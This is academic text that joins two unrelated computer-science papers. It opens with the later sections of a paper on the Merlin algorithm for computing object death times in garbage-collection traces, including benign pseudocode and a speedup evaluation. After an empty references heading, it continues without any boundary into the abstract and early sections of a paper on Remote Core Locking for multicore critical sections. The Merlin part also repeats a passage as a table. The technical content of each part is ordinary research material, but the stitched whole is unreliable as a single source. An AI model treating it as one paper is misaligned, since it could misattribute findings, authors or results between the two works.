Now suppose that the system runs, performing occasional garbage collections. Consider the situation immediately following one of these GCs. The collector determines which objects are unreachable and which may still be live. For tracing purposes, we need to compute exactly when the unreachable objects were last reachable. The timestamps can be used to compute these times. Consider a dead object with the latest timestamp. The object must have been last reachable at that time, for if it were reachable later, it would have been pointed to by an object with an even later timestamp — but this is the latest time. Now consider the pointers in the dead object with the latest death time. Any objects that are the target of these pointers would have also been reachable at the time stamped into the original object. Thus we propagate the last reachable time from the first object to the objects to which it points. In fact, we should propagate this last reachable time from a dead object to the objects to which it points until we can propagate it no further. To prevent infinite propagation through cycles, the algorithm simply stops if an object was last reachable at a time equal to or later than the last reachable time of the source object. Once this processing is completed for the object with the latest timestamp, we have found the objects that were last reachable at that time. We can then remove them from the set of dead objects and consider the latest timestamp among the remaining objects. The last reachable time arguments apply iteratively, so we can determine this time for every object that the GC found was unreachable. #### 6.2 Merlin Details and Implementation While the previous section provides an overview of Merlin, this section presents a detailed discussion of why the Merlin algorithm works and discusses implementation issues. As discussed in Section 2.3, finding which objects are dead requires a reachability analysis. 
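The propagation step just described can be sketched in a few lines of C (again our own toy structures, with liveness checks omitted for brevity): a dead object's last-reachable time floods depth-first into the objects it points to, and the equal-or-later cutoff both stops cycles and preserves provably later times:

```c
#include <stddef.h>

enum { MAX_FIELDS = 2 };

typedef struct Obj {
    long stamp;                     /* candidate last-reachable time */
    struct Obj *fields[MAX_FIELDS]; /* outgoing pointers */
} Obj;

/* Propagate src's time to its targets; stop when a target's time is
 * equal or later (a cycle, or the target outlived src). */
static void propagate(Obj *src) {
    for (int i = 0; i < MAX_FIELDS; i++) {
        Obj *t = src->fields[i];
        if (t != NULL && t->stamp < src->stamp) {
            t->stamp = src->stamp;
            propagate(t);           /* depth-first; revisits are cut off */
        }
    }
}
```

On a three-object cycle stamped 5, 3, 1, one call starting at the latest object stamps all three with 5 and terminates, mirroring how the cutoff prevents infinite propagation.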
Our new algorithm cannot change this requirement, but instead improves upon the previous brute force method by computing the last instant that an object was reachable. To compute when objects were last reachable, the Merlin algorithm does a small amount of work as the program runs and when the trace must be accurate, and then performs less frequent GCs during trace generation. After the system invokes a GC, the Merlin algorithm works backward in time to find exactly when each object that the garbage collector found unreachable was last reachable. In brute force trace generation, by contrast, a death record is appended to the trace only when an object is first discovered to be unreachable. There are three ways in which an object can transition from reachable to unreachable:

1. An object transitions from one to zero incoming references via a pointer update. Objects A and B in Figure 2 are examples of this case.

2. An object transitions from n to n - 1 incoming references via a pointer update, where all n - 1 remaining references are from unreachable objects. An example of this case is object C in Figure 2.

3. An object’s number of incoming references does not change, but all the reachable objects pointing to it become unreachable. The objects labeled D, E, and F in Figure 2 are examples of this case.
Table 5: How objects become unreachable

<table>
<thead>
<tr>
<th>Scenario</th>
<th>How the object becomes unreachable</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>The object transitions from one to zero incoming references via a pointer update (objects A and B in Figure 2).</td>
</tr>
<tr>
<td>2</td>
<td>The object transitions from n to n - 1 incoming references via a pointer update, where all n - 1 remaining references are from unreachable objects (object C in Figure 2).</td>
</tr>
<tr>
<td>3</td>
<td>The object’s number of incoming references does not change, but all the reachable objects pointing to it become unreachable (objects D, E, and F in Figure 2).</td>
</tr>
</tbody>
</table>

Figure 2: Objects A and B are reachable until their last incoming reference is removed. Object C is last reachable when an incoming reference is removed, even though it retains others. Objects D, E, and F are reachable until an action that does not affect their incoming references.

6.2.1 How Objects Become Unreachable

To understand how the Merlin algorithm works backward in time to compute when an object was last reachable, it is important to understand how objects become unreachable. Table 5 generalizes how objects within the heap transition from reachable to unreachable. Scenarios 1 and 2 describe an object that is reachable until an action involves the object; Scenario 3 describes an object that is last reachable without being directly involved in an action. Clearly, not every pointer store is the last time an object is reachable, but any object that does become unreachable because of a pointer store must be in the transitive closure set of the object that lost an incoming reference.

6.2.2 Finding Potential Last Reachable Times

Knowing how objects transition from reachable to unreachable, and using the concept of time, it is now possible to find each object’s last reachable time.
Since it is not always clear whether a pointer store is the last time an object is reachable (if a pointer update leaves an object with no incoming references, it is clear the update is the last time the object is reachable; if an update leaves the object with n remaining incoming references, it is not clear whether the object continues to be reachable), just counting the number of incoming references (reference counting) is not sufficient to determine last reachable times. The following paragraphs consider the different ways in which objects transition from reachable to unreachable and present the Merlin pseudo-code that computes these last reachable times.

Instrumented Pointer Stores: Most pointer stores will be instrumented by a write barrier. Objects may be reachable until a pointer store, caught by a write barrier, removes an incoming reference. The Merlin trace generator stamps the object losing an incoming reference (the old target of the pointer) with the current time. Since time increases monotonically, each object will ultimately be stamped with the final time it loses an incoming reference. If the last incoming reference is removed by an instrumented pointer store, the Merlin code shown in Figure 4 stamps the object with the last time it was reachable.

Uninstrumented Pointer Stores: Root pointers may not have their pointer stores instrumented. An object that is reachable until a root pointer update may not have the time it transitions from reachable to unreachable detected by any instrumentation. Just as a normal GC begins with a root scan, our trace generator performs a modified root scan whenever the trace must be accurate. This modified root scan also enumerates the root pointers, but merely stamps the root-referenced objects with the current time. While root-referenced, objects are always stamped with the current time; so if an object was reachable until a root pointer update, its timestamp will hold the last time the object was reachable.
Figure 5 shows the pseudo-code Merlin executes whenever the root scan enumerates a pointer.

Referring Objects Become Unreachable: We must also compute last reachable times for objects that are unreachable only because the object(s) pointing to them are unreachable (Scenario 3 of Table 5). For chains of such objects, updating the last reachable time of one object requires recomputing the last reachable times of the objects to which it points. We simplify this process by noting that each such object’s last reachable time is the latest last reachable time among the objects whose transitive closure sets contain it.

6.2.3 Computing When Objects Become Unreachable

Because the Merlin algorithm is concerned with when an object was last reachable, and cannot always determine how the object became unreachable, the issue is to find a single method that computes every object’s last reachable time. The methods of Figures 4 and 5 stamp the correct last reachable time for objects that are last reachable as described in Scenarios 1 and 2 of Table 5. By combining the two timestamping methods with computing last reachable times by membership in transitive closure sets, Merlin can determine the last reachable time of every object. To demonstrate that this combined method works, we consider each scenario from Table 5. Since no object continues to point to an object last reachable as described by Scenario 1 of Table 5 after it is last reachable, the latter object will only be a member of its own transitive closure set. Therefore, the last reachable time Merlin computes will be the object’s own timestamp. The last reachable time computed for an object that is last reachable as in Scenario 2 of Table 5 will also be the time with which it is stamped: this object was last reachable when its timestamp was last updated, and since any objects that point to it must be unreachable, the pointing objects cannot have later last reachable times.
Thus, the transitive closure computation will determine that the object was last reachable at the time with which it is already stamped. We showed above that this combined method computes last reachable times for objects that are last reachable as in Scenario 3 of Table 5, so Merlin can compute last reachable times by combining timestamping with computing the transitive closures, and need not know how each object transitioned from reachable to unreachable.

6.2.4 Computing Death Times Efficiently

Computing the full transitive closure sets is a time-consuming process, requiring \(O(n^2)\) time. But finding an object’s last reachable time requires knowing only the latest object whose transitive closure set contains it. Rather than formally computing the transitive closure sets, Merlin performs a depth-first search from each object, propagating the last reachable time forward to the objects visited in the search. To save time, Merlin begins by ordering the objects from the earliest timestamp to the latest and then pushing them onto the search stack so that the latest object will be popped first. Figure 3(a) shows this initialization. Upon removing an object from the stack, the Merlin algorithm analyzes its fields to find pointers to other objects. If a pointed-to object could be unreachable and is stamped with an earlier time than the referring object, then the pointed-to object is stamped with this later time. If the object is definitely unreachable, it is pushed onto the stack after its timestamp is updated (e.g., Figures 3(b) and 3(c)). If a pointed-to object’s time is equal to that of the referring object, then either we have found a cycle (e.g., Figure 3(c)) or the pointed-to object is already on the stack to propagate this time; either way, the pointed-to object need not be pushed onto the stack. If a pointed-to object’s time is later, then the object remained reachable after the time being propagated, and this possible last reachable time is unimportant.
Pushing objects onto the stack from the earliest timestamp to the latest means each object is processed only once: the search proceeds from the latest timestamp to the earliest, so any later examination of an object would only be computing an earlier last reachable time. This method of finding last reachable times requires only \(O(n \log n)\) time, the sorting of the objects being the limiting factor. Figure 6 shows the code the Merlin algorithm uses for this modified depth-first search.

6.3 The Merlin Trace Generator

As described so far, Merlin is able to reconstruct when objects were last reachable, but it is unable to determine which objects are no longer reachable: it still needs a reachability analysis. The Merlin algorithm uses two simple solutions to overcome this. Whenever possible, it delays computation until immediately after a garbage collection. Before any memory is cleared, the trace generation algorithm has access to the objects within the heap and to the garbage collector’s reachability analysis; this piggy-backing saves a lot of duplicative analysis. At other times (e.g., when a program terminates), garbage collection may not be invoked but the algorithm still needs a reachability analysis. In that case, we first stamp the root-referenced objects with the current time and then compute the last reachable times of every object in the heap. Objects with a last reachable time equal to the current time must be reachable from the program roots and are therefore still alive; all other objects are unreachable, and their death records are added to the trace. This method of finding unreachable objects enables the Merlin algorithm to work with any garbage collector. Even if the garbage collector cannot guarantee that it will collect all unreachable objects, when the program terminates Merlin performs the combined object reachability / last reachable time analysis to find the unreachable objects and their last reachable times.
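Both the depth-first search of Section 6.2.4 and the termination-time analysis above rest on the same sorted-stack propagation. The sketch below is our own simplified, self-contained C analogue of the paper's Figure 6 pseudocode, with a fixed-size toy heap and a `dead` flag standing in for the collector's reachability analysis:

```c
#include <stdlib.h>
#include <stddef.h>

enum { MAX_OUT = 2 };

typedef struct Node {
    long stamp;                /* last time the node lost an incoming ref */
    struct Node *out[MAX_OUT]; /* outgoing pointers */
    int dead;                  /* set by the collector's reachability analysis */
} Node;

static int byStamp(const void *x, const void *y) {
    const Node *a = *(const Node *const *)x, *b = *(const Node *const *)y;
    return (a->stamp > b->stamp) - (a->stamp < b->stamp);
}

/* Give every dead node the latest stamp among dead nodes that reach it. */
static void computeDeathTimes(Node **dead, int n) {
    Node *stack[128];
    int top = 0;
    qsort(dead, (size_t)n, sizeof *dead, byStamp);  /* earliest first... */
    for (int i = 0; i < n; i++)
        stack[top++] = dead[i];                     /* ...latest popped first */
    while (top > 0) {
        Node *obj = stack[--top];
        for (int i = 0; i < MAX_OUT; i++) {
            Node *t = obj->out[i];
            if (t != NULL && t->dead && t->stamp < obj->stamp) {
                t->stamp = obj->stamp;              /* later last-reachable time */
                stack[top++] = t;                   /* propagate further */
            }
        }
    }
}
```

Sorting dominates the cost, matching the O(n log n) bound; a node is pushed again only when its stamp strictly increases, so cycles terminate just as in Figure 3.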
As stated in Section 2.1, we rely upon two assumptions about the host GC. First, any unreachable object that the GC treats as live must have the objects it points to treated as live as well, as is the case in many GC algorithms; thus no object is removed from the heap until all objects pointing to it are removed. Second, the Merlin algorithm assumes that there are no pointer stores involving an unreachable object, i.e., that once an object becomes unreachable, its incoming and outgoing references are constant. Both of these preconditions are important for our transitive closure computation, and languages such as Java and Smalltalk satisfy them. The order in which the Merlin trace generator adds information to the trace is an issue. As discussed in Section 6.2, our trace generator needs the concept of time to determine where in the trace each object death record should be placed. The object death records must either be inserted into the trace in chronological order before the trace is written to disk, or be appended to the trace with a post-processing step placing the trace into the proper order. Holding all the trace records in memory until the object deaths are resolved is a difficult challenge: for larger traces, holding these records can require significant amounts of memory. Our implementation of the Merlin algorithm uses an external post-processing step that sorts and integrates the object death records. Either way of handling this issue has advantages and disadvantages, but both add very little time to trace generation.

6.4 Object Allocations and Pointer Updates

Trace generation is already efficient at finding and reporting object allocations and pointer updates. As discussed in Section 2.3, even the brute force method of trace generation can find and record these actions in linear time. Our new algorithm, like those before it, instruments the host system’s memory manager to determine when memory is allocated for new objects.
At those times, Merlin records the object allocation in the trace. Finding and reporting pointer updates also does not change: like brute force trace generation, the Merlin algorithm instruments the heap pointer store operations (preferably by augmenting existing write barriers). Our new trace generation algorithm does add one requirement, for the reasons explained in Section 6.2.2: unlike brute force, our trace generator requires access to the object being updated, the new value of the pointer, and the old value of the pointer. As many write barriers are already implemented to access these values (e.g., a write barrier capable of reference counting), this additional requirement is not a hardship. Allowing our trace generator to work with almost any garbage collector (rather than requiring a semi-space collector) makes the instrumentation to record pointer updates easier to add. While a semi-space collector does not require a write barrier, many algorithms (e.g., generational and OF collectors) do, and specific languages/systems require a write barrier for their own reasons. Combining our trace generator with these algorithms allows the use of the existing write barriers, enabling the Merlin trace generator to leverage this code.

7. EVALUATION OF MERLIN

We implemented both Merlin and the brute force trace generation algorithm within the Jikes virtual machine. We then performed some initial timing runs on a Macintosh Power Mac G4 with two 533 MHz processors, 32KB on-chip L1 data and instruction caches, 256KB unified L2 cache, 1MB off-chip L3 cache, and 384MB of memory, running PPC Linux 2.4.3. We used only one processor for our experiments, which were run in single-user mode with the network card disabled.

Figure 3: Computing object death times, where $t_i < t_{i+1}$. Since Object D does not have any incoming references, Merlin’s computation cannot change its timestamp. Although Object A was last reachable at its timestamp, care is needed so that the last reachable time does not change while processing its incoming reference. In (a), Object A is processed, finding the pointer to Object B. Object B’s timestamp is earlier, so Object B’s last reachable time is set and Object B is added to the stack. We process Object B and find the pointer to Object C in (b). Object C has an earlier timestamp, so it is added to the stack and its timestamp updated. In (c), Object C is processed. Object A is pointed to, but it does not have an earlier timestamp and is not added to the stack. After (c), the cycle has finished being processed. The remaining objects in the stack will be examined, but no further processing is needed.

```c
void PointerStoreInstrumentation(ADDRESS source, ADDRESS newTarget) {
    ADDRESS oldTarget = getMemoryWord(source);
    if (oldTarget != null)
        oldTarget.timeStamp = currentTime;
    addToTrace(pointerUpdate, source, newTarget);
}
```

Figure 4: Code for Merlin’s pointer store instrumentation

```c
void ProcessRootPointer(ADDRESS rootAddr) {
    ADDRESS rootTarget = getMemoryWord(rootAddr);
    if (rootTarget != null)
        rootTarget.timeStamp = currentTime;
}
```

Figure 5: Code for Merlin’s root pointer processing

```c
void ComputeObjectDeathTimes() {
    Time lastTime = ∞;
    sort unreachable objects from the earliest timestamp to the latest;
    push each unreachable object onto a stack from the earliest timestamp to the latest;
    while (!stack.empty()) {
        Object obj = stack.pop();
        Time objTime = obj.timeStamp;
        if (objTime <= lastTime)
            lastTime = objTime;
        for each (field in obj) {
            if (isPointer(field) && field != null) {
                Object target = getMemoryWord(field);
                Time targetTime = target.timeStamp;
                if (isUnreachable(target) && targetTime < lastTime) {
                    target.timeStamp = lastTime;
                    stack.push(target);
                }
            }
        }
    }
}
```

Figure 6: Code for Merlin’s last reachable time computation

Figure 7: The speedup of Merlin versus brute force trace generation. Note the log-log scale.
We built two versions of the VM, one for each of the algorithms. Whenever possible we used identical code for the two JVMs, so Merlin is implemented with a semi-space collector. Merlin’s running time is spent largely in performing the modified root scan that is required at every accurate point in the trace. We therefore improved Merlin’s running time with a number of optimizations that minimize the number of root pointers that must be enumerated at each of these locations. The first optimization was to instrument pointer store operations involving static (global) pointers. With this instrumentation, Merlin does not need to enumerate the static pointers at each accurate point, as the instrumentation marks objects whenever they lose an incoming reference from a static field. Because Java allows functions to access only their own stack frame, repeated scanning within the same method always enumerates the same objects from the pointers below this method’s frame. We therefore implemented a stack barrier that is called when frames are popped off the stack, enabling Merlin to scan less deeply into the stack and further reducing the time needed for Merlin tracing [6]. Because they would not improve brute force tracing, these optimizations were used only with Merlin tracing. We generated traces at different granularities across a small range of programs. Because of the time required for brute force trace generation, we limited some traces to only the initial few megabytes of data allocation. Working with common benchmarks and generating traces of identical granularity, Merlin achieved speedup factors of up to 816. In the time that brute force needed to generate traces with 16 to 1024KB of granularity, Merlin generated perfect traces. Figure 7 shows the speedup that Merlin, generating perfect traces, achieves over the brute force algorithm generating traces at different levels of granularity. Clearly, Merlin can greatly reduce the time needed to generate a trace.
However, as seen in Figure 7, the speedup shrinks as granularity increases. The time required depends on the time needed to generate object death records and, therefore, on trace granularity. Brute force limits object death processing to the points where the trace must be accurate, so as the granularity increases, the time it needs greatly diminishes. While Merlin needs to perform only periodic collections, it must also perform a small set of actions at each pointer update and at each location in the trace with perfect knowledge. Even though brute force still performs more frequent GCs, the cost of Merlin’s frequent root enumerations and timestamp updates eventually outweighs this advantage. These results are promising, but we believe the performance of the Merlin tracing algorithm can be improved even more. As a program’s memory footprint grows, and as more accurate points are needed, the Merlin algorithm is far less affected than brute force.

8. RELATED WORK

We do not know of any previous research into the effects of trace granularity or into different methods of generating garbage collection traces. In this section, we discuss the research from which this study draws its roots.

Using Knowledge of the Future: Belady’s [4] optimal virtual memory page replacement policy, MIN, decides which blocks should not be paged to disk by analyzing future events. At each decision point, the MIN algorithm considers future memory accesses, stored within an available file, until it determines the single block to evict. Because the algorithm does not cache results, it begins a new analysis at each decision point. While Belady’s algorithm uses knowledge of future events to perform optimally, it processes events in chronological order: each time it is invoked, the MIN algorithm looks only as far into the future as is necessary to make the current decision.
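To make Belady's policy concrete, here is a small self-contained C sketch (our own simplification: a fixed-size cache and page numbers as ints) that, like MIN, re-scans the future access sequence at every eviction decision rather than caching results:

```c
enum { CAP = 2, LEN = 8 };

/* Return the index of the next use of page p after position i, or LEN. */
static int nextUse(const int *refs, int i, int p) {
    for (int j = i + 1; j < LEN; j++)
        if (refs[j] == p) return j;
    return LEN;
}

/* Belady's MIN: count misses, evicting the resident page whose next
 * use lies farthest in the future. */
static int minMisses(const int *refs) {
    int cache[CAP], used = 0, misses = 0;
    for (int i = 0; i < LEN; i++) {
        int hit = 0;
        for (int k = 0; k < used; k++)
            if (cache[k] == refs[i]) hit = 1;
        if (hit) continue;
        misses++;
        if (used < CAP) { cache[used++] = refs[i]; continue; }
        int victim = 0;                 /* fresh scan of the future, as in MIN */
        for (int k = 1; k < CAP; k++)
            if (nextUse(refs, i, cache[k]) > nextUse(refs, i, cache[victim]))
                victim = k;
        cache[victim] = refs[i];
    }
    return misses;
}
```

On the reference string 1, 2, 3, 1, 2, 1, 2, 3 with a two-page cache, this yields five misses; note the contrast with Merlin, whose backward pass never has to re-examine a decision.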
Cyclic Reference Counting: One of the earliest methods of garbage collection was reference counting: each object has a count of its incoming references and, when the count reaches 0, the object can be freed [8]. McBeth was the first to appreciate that this approach cannot collect cycles of objects, since the reference counts within a dead cycle never reach zero [9]. Many different schemes have been developed to deal with cycles. Trial deletion [17] collects cycles of objects by removing a pointer thought to be within a cycle and then updating the reference counts. If, in updating the reference counts, the source object of the removed pointer is found unreachable, then a cycle exists and the objects are dead. Otherwise, a dead cycle may not exist; the deleted pointer is reestablished and the original reference counts are restored. This method can detect and collect cycles, but it may incorrectly guess that some objects are in a cycle, and it cannot take advantage of other object reachability analyses. Merlin does not perform any explicit reference counting, though it marks objects whenever they lose an incoming reference. In general, reference counting methods cannot properly determine when cycles of objects become unreachable; while methods such as trial deletion have been developed to avoid this problem, they cannot both guarantee that they will determine when each object became unreachable and process each object only once. Using Merlin, as opposed to reference counting, allows both of these requirements to be met.

Lifetime Approximation: To cope with the cost of producing GC traces, there has been previous research into approximating the lifetimes of objects. These approximations model the object allocation and object death behavior of actual programs. One paper described mathematical functions that model object lifetime characteristics based upon the actual lifetime characteristics of 58 Smalltalk and Java programs [14].
Zorn and Grunwald compare several different models one can use to approximate the object allocation and object death records of actual programs [18]. Neither study attempted to generate actual traces, nor did either study consider the effects of pointer updates; rather, these studies sought ways other than trace generation to produce input for memory management simulations.

9. SUMMARY

The use of granulated traces for garbage collection simulation raises a number of issues. We first develop a method by which any variable that affects garbage collection simulations can be statistically tested. We then use this method to show that, over a wide range of variables, granulated traces produce results that are significantly different from those produced by perfect traces. Additionally, we show that some ways of simulating granulated traces are better than others at minimizing these issues. With these results, we propose changing the trace format standard to include additional information. Finally, we introduce and describe the Merlin Trace Generation Algorithm. We show that the Merlin algorithm can produce traces more than 800 times as fast as the common brute force method of trace generation. By generating traces with Merlin, we can create perfect traces in less time than previously required for granulated traces. Thus, the Merlin algorithm makes trace generation quick and easy, and eliminates the need for granulated traces.

Acknowledgments

We would like to thank John N. Zigman for his work in developing gc-sim and also Aaron Cass for his help processing much of this data.

10. REFERENCES
Remote Core Locking: Migrating Critical-Section Execution to Improve the Performance of Multithreaded Applications

Jean-Pierre Lozi, Florian David, Gaël Thomas, Julia Lawall, Gilles Muller (LIP6/INRIA, firstname.lastname@lip6.fr)

**Abstract** The scalability of multithreaded applications on current multicore systems is hampered by the performance of lock algorithms, due to the costs of access contention and cache misses. In this paper, we propose a new lock algorithm, Remote Core Locking (RCL), that aims to improve the performance of critical sections in legacy applications on multicore architectures. The idea of RCL is to replace lock acquisitions by optimized remote procedure calls to a dedicated server core. RCL limits the performance collapse observed with other lock algorithms when many threads try to acquire a lock concurrently, and removes the need to transfer lock-protected shared data to the core acquiring the lock, because such data can typically remain in the server core’s cache. We have developed a profiler that identifies the locks that are the bottlenecks in multithreaded applications and that can thus benefit from RCL, and a reengineering tool that transforms POSIX locks into RCL locks. We have evaluated our approach on 18 applications: Memcached, Berkeley DB, the 9 applications of the SPLASH-2 benchmark suite and the 7 applications of the Phoenix2 benchmark suite. 10 of these applications, including Memcached and Berkeley DB, are unable to scale because of locks, and benefit from RCL. Using RCL locks, we get performance improvements of up to 2.6 times with respect to POSIX locks on Memcached, and up to 14 times with respect to Berkeley DB.

### 1 Introduction

Over the last twenty years, a number of studies [2, 3, 5, 12, 13, 15, 17, 24, 26, 27] have attempted to optimize the execution of critical sections on multicore architectures, either by reducing access contention or by improving cache locality.
Access contention occurs when many threads simultaneously try to enter critical sections that are protected by the same lock, causing the cache line containing the lock to bounce between cores. Cache locality becomes a problem when a critical section accesses shared data that has recently been accessed on another core, resulting in cache misses, which greatly increase the critical section’s execution time. Addressing access contention and cache locality together remains a challenge. These issues imply that some applications that work well on a small number of cores do not scale to the number of cores found in today’s multicore architectures. Recently, several approaches have been proposed to execute a succession of critical sections on a single server core to improve cache locality [13, 27]. Such approaches also incorporate a fast transfer of control from other client cores to the server, to reduce access contention. Suleman et al. [27] propose a hardware-based solution, evaluated in simulation, that introduces new instructions to perform the transfer of control, and uses a special fast core to execute critical sections. Hendler et al. [13] propose a software-only solution, Flat Combining, in which the server is an ordinary client thread, and the role of server is handed off between clients periodically. This approach, however, slows down the thread playing the role of server, incurs an overhead for the management of the server role, and drastically degrades performance at low contention. Furthermore, neither Suleman et al.’s algorithm nor Hendler et al.’s algorithm can accommodate threads that block within a critical section, which makes them unable to support widely used applications such as Memcached. 
In this paper, we propose a new locking technique, Remote Core Locking (RCL), that aims to improve the performance of legacy multithreaded applications on multicore hardware by executing remotely, on one or several dedicated servers, critical sections that access highly contended locks. Our approach is entirely implemented in software and targets commodity x86 multicore architectures. At the basis of our approach is the observation that most applications do not scale to the number of cores found in modern multicore architectures, and thus it is possible to dedicate the cores that do not contribute to improving the performance of the application to serving critical sections. Thus, it is not necessary to burden the application threads with the role of server, as done in Flat Combining. RCL also accommodates blocking within critical sections as well as nested critical sections. The design of RCL addresses both access contention and locality. Contention is solved by a fast transfer of control to a server, using a dedicated cache line for each client to achieve busy-wait synchronization with the server core. Locality is improved because shared data is likely to remain in the server core’s cache, allowing the server to access such data without incurring cache misses. In this, RCL is similar to Flat Combining, but has a much lower overall overhead. We propose a methodology along with a set of tools to facilitate the use of RCL in a legacy application. Because RCL serializes critical sections associated with locks managed by the same core, transforming all locks into RCLs on a smaller number of servers could induce false serialization. Therefore, the programmer must first decide which locks should be transformed into RCLs and on which core(s) to run the server(s). For this, we have designed a profiler to identify which locks are frequently used by the application and how much time is spent on locking. 
Based on this information, we propose a set of simple heuristics to help the programmer decide which locks must be transformed into RCLs. We have also designed an automatic reengineering tool for C programs that transforms the code of critical sections so that it can be executed as a remote procedure call on the server core: the code within the critical sections must be extracted as functions, and the variables referenced or updated by the critical section that are declared by the function containing it must be sent as arguments, amounting to a context, to the server core. Finally, we have developed a runtime for Linux that is compatible with POSIX threads, and that supports a mixture of RCL and POSIX locks in a single application.

RCL is well-suited to improve the performance of a legacy application in which contended locks are an obstacle to performance, since using RCL improves locality and resistance to contention without requiring a deep understanding of the source code. By contrast, modifying locking schemes to use fine-grained locking or lock-free data structures is complex, requires an overhaul of the source code, and does not improve locality. We have evaluated the performance of RCL as compared to other locks on a custom latency microbenchmark measuring the execution time of critical sections that access a varying number of shared memory locations. Furthermore, based on the results of our profiler, we have identified Memcached, Berkeley DB with two types of TPC-C transactions, two benchmarks in the SPLASH-2 suite, and three benchmarks in the Phoenix2 suite as applications that could benefit from RCL. In each of these experiments, we compare RCL against the standard POSIX locks and the most efficient approaches for implementing locks of which we are aware: CAS spinlocks, MCS [17] and Flat Combining [13].
Comparisons are made for the same number of cores, which means that there are fewer application threads in the RCL case, since one or more cores are dedicated to RCL servers. On an Opteron 6172 48-core machine running a 3.0.0 Linux kernel with glibc 2.13, our main results are:

- On our latency microbenchmark, under high contention, RCL is faster than all the other tested approaches: over 3 times faster than the second best approach, Flat Combining, and 4.4 times faster than POSIX.
- On our benchmarks, we found that contexts are small, and thus the need to pass a context to the server has only a marginal performance impact.
- On most of our benchmarks, only one lock is frequently used and therefore only one RCL server is needed. The only exception is Berkeley DB, which requires two RCL servers to prevent false serialization.
- On Memcached, for Set requests, RCL provides a speedup of up to 2.6 times over POSIX locks, 2.0 times over MCS and 1.9 times over spinlocks.
- For TPC-C Stock Level transactions, RCL provides a speedup of up to 14 times over the original Berkeley DB locks for 40 simultaneous clients and outperforms all other locks for more than 10 clients. Overall, RCL degrades more gracefully as the number of simultaneous clients increases.

The rest of the paper is structured as follows. Sec. 2 presents RCL and the use of profiling to automate the reengineering of a legacy application for use with RCL. Sec. 3 describes the RCL runtime. Sec. 4 presents the results of our evaluation. Sec. 5 presents other work that targets improving locking on multicore architectures. Finally, Sec. 6 concludes.

### 2 RCL Overview

The key idea of RCL is to transfer the execution of a critical section to a server core that is dedicated to one or more locks (Fig. 1). To use this approach, it is necessary to choose the locks for which RCL is expected to be beneficial and to reengineer the critical sections associated with these locks as remote procedure calls.
In this section, we first describe the core RCL algorithm, then present a profiling tool to help the developer choose which locks to implement using RCL, and a reengineering tool that rewrites the associated critical sections.

### 2.1 Core algorithm

Using RCL, a critical section is replaced by a remote procedure call to a procedure that executes the code of the critical section. To implement the remote procedure call, the clients and the server communicate through an array of request structures, specific to each server core (Fig. 2). This array has size $C \cdot L$ bytes, where $C$ is a constant representing the maximum number of allowed clients (a large number, typically much higher than the number of cores), and $L$ is the size of the hardware cache line. Each request structure $req_i$ is $L$ bytes and allows communication between a specific client $c_i$ and the server. The array is aligned so that each structure $req_i$ is mapped to a single cache line. The first three machine words of each request $req_i$ contain respectively: (i) the address of the lock associated with the critical section, (ii) the address of a structure encapsulating the context, i.e., the variables referenced or updated by the critical section that are declared by the function containing the critical section code, and (iii) the address of a function that encapsulates the critical section for which the client $c_i$ has requested the execution, or NULL if no critical section is requested.

**Client side** To execute a critical section, a client $c_i$ first writes the address of the lock into the first word of the structure $req_i$, then writes the address of the context structure into the second word, and finally writes the address of the function that encapsulates the code of the critical section into the third word. The client then actively waits for the third word of $req_i$ to be reset to NULL, indicating that the server has executed the critical section. In order to improve energy efficiency, if there are fewer clients than the number of cores available, the SSE3 `monitor/mwait` instructions can be used to avoid spinning: the client sleeps and is woken up automatically when the server writes into the third word of $req_i$.

**Server side** A servicing thread iterates over the requests, waiting for one of them to contain a non-NULL value in its third word. When such a value is found, the servicing thread checks whether the requested lock is free and, if so, acquires the lock and executes the critical section using the function pointer and the context. When the servicing thread is done executing the critical section, it resets the third word to NULL and resumes the iteration.

Fig. 1: Critical sections with POSIX locks vs. RCL. Fig. 2: The request array. Client $c_2$ has requested execution of the critical section implemented by `foo`.
### 2.2 Profiling

To help the user decide which locks to transform into RCLs, we have designed a profiler that is implemented as a dynamically loaded library and that intercepts calls involving POSIX locks, condition variables, and threads. The profiler returns information about the overall percentage of time spent in critical sections, as well as about the percentage of time spent in critical sections for each lock. We define the time spent in a critical section as the total time to acquire the lock (blocking time included), execute the critical section itself, and release the lock. It is measured by reading the cycle counter before and after each critical section, and by comparing the total measured time in critical sections with the total execution time, for each thread. The overall percentage of time spent in critical sections can help identify applications for which using RCL may be beneficial, and the percentage of time spent in critical sections for each lock helps guide the choice of which locks to transform into RCLs. For each lock, the profiler also produces information about the number of cache misses in its critical sections, as these may be reduced by the improved locality of RCL.

Fig. 3 shows the profiling results for 18 applications, including Memcached v1.4.6 (an in-memory cache server), Berkeley DB v5.2.28 (a general-purpose database), the 9 applications of the SPLASH-2 benchmark suite (parallel scientific applications), and the 7 applications of the Phoenix v2.0.0 benchmark suite (MapReduce-based applications) with the “medium” dataset. Raytrace and Memcached are each tested with two different standard working sets, and Berkeley DB is tested with the 5 standard transaction types from TPC-C.
A gray box indicates that the application has not been run for that number of cores because, even at 48 cores, locking is not a problem. Ten of the tests spend more than 20% of their time in critical sections and thus are candidates for RCL. Indeed, for these tests, the percentage of time spent in critical sections directly depends on the number of cores, indicating that the POSIX locks are one of the main bottlenecks of these applications. We see in Sec. 4.1 that if the percentage of time executing critical sections for a given lock is over 20%, then an RCL will perform better than a POSIX lock, and if it is over 70%, then an RCL will perform better than all other known lock algorithms. We also observe that the critical sections of Memcached/SET incur many cache misses. Finally, Berkeley DB uses hybrid Test-And-Set/POSIX locks, which causes the profiler to underestimate the time spent in critical sections.

\(^1\)More information about these applications can be found at the following URLs: http://memcached.org (Memcached), http://www.oracle.com/technetwork/database/berkeleydb (Berkeley DB), http://www.capsl.udel.edu/splash (SPLASH-2) and http://mapreduce.stanford.edu (Phoenix2).

### 2.3 Reengineering legacy applications

If the results of the profiling show that some locks used by the application can benefit from RCL, the developer must reengineer all critical sections that may be protected by the selected locks into separate functions that can be passed to the lock server. This reengineering amounts to an “Extract Method” refactoring [10]. We have implemented this reengineering using the program transformation tool Coccinelle [21], in 2115 lines of code. It has a negligible impact on performance. The main problem in extracting a critical section into a separate function is to bind the variables needed by the critical section code.
The extracted function must receive the values of variables that are initialized prior to the critical section and read within it, and return the values of variables that are updated in the critical section and read afterwards. Only variables local to the function are concerned; alias analysis is not required because aliases involve addresses that can be referenced from the server. The values are passed to and from the server in an auxiliary structure, or directly in the client’s cache line in the request array (Fig. 2) if only one value is required.

